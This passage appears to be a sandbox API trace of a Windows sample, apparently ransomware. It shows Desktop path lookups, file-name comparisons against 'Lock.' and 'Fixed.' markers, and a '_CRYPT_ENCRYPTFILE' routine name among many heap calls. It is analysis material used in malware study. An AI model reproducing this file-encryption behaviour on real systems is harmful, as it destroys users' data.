Flags=0x0, Size=0x10) returned 0x2e53938 [0153.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0153.351] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0153.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0153.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0153.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0153.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0153.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0153.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0153.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0153.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0153.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0153.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0153.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0153.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0153.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0153.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0153.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0153.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0153.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0153.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0153.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0153.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x56) returned 0x2e563a8 [0153.352] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/GHvT80V7X_pq3d.png", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\GHvT80V7X_pq3d.png", lpFilePart=0x8cf650*="GHvT80V7X_pq3d.png") returned 0x2a [0153.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0153.353] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\GHvT80V7X_pq3d.png" (normalized: "c:\\users\\fd1hvy\\desktop\\ghvt80v7x_pq3d.png")) returned 0xffffffff [0153.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0153.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0153.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0153.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0153.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0153.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0153.433] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0153.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0153.433] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0153.434] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0153.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0153.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0153.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0153.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0153.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0153.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0153.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0153.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0153.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0153.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0153.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0153.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0153.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0153.434] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GUlu8dq_.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0153.434] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ulu8dq_.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0153.434] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lu8dq_.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0153.434] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u8dq_.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0153.434] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8dq_.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0153.434] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dq_.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0153.434] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q_.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0153.434] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0153.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0153.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0153.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0153.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0153.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0153.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0153.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0153.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0153.435] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0153.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0153.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0153.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0153.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0153.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0153.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0153.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0153.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0153.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0153.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0153.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0153.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0153.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0153.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0153.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0153.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0153.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0153.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0153.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1a) returned 0x2e79310 [0153.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0153.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GUlu8dq_.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0153.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ulu8dq_.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0153.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lu8dq_.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0153.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u8dq_.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0153.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8dq_.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0153.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dq_.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0153.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q_.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0153.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0153.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0153.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0153.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0153.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0153.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0153.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0153.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0153.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0153.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0153.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0153.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0153.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0153.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977938 | out: hHeap=0x970000) returned 1 [0153.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0153.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0153.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0153.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0153.436] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0153.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff10 [0153.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0153.436] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0153.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff10 | out: hHeap=0x970000) returned 1 [0153.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0153.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0153.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ca8 [0153.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0153.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0153.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0153.437] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0153.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0153.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0153.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0153.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0153.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0153.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0153.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0153.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0153.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0153.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0153.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0153.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0153.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0153.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0153.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0153.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0153.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0153.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0153.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0153.437] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0153.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0153.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0153.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0153.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0153.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0153.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0153.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0153.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0153.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0153.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0153.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0153.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0153.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0153.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0153.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b88 [0153.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0153.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0153.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0153.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0153.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b38 [0153.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0153.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0153.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0153.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53890 [0153.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0153.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0153.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0153.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0153.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0153.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0153.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0153.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0153.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0153.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0153.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0153.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0153.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0153.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0153.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0153.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0153.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0153.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0153.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0153.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0153.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0153.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0153.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0153.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0153.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0153.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0153.439] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0153.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0153.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0153.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0153.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0153.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0153.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0153.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0153.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0153.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0153.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0153.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0153.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0153.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0153.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0153.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0153.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0153.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0153.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0153.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0153.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0153.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0153.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0153.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0153.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0153.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0153.440] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0153.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0153.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0153.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0153.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0153.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0153.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0153.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0153.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0153.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0153.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0153.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0153.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0153.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0153.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0153.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0153.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0153.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0153.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0153.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0153.441] 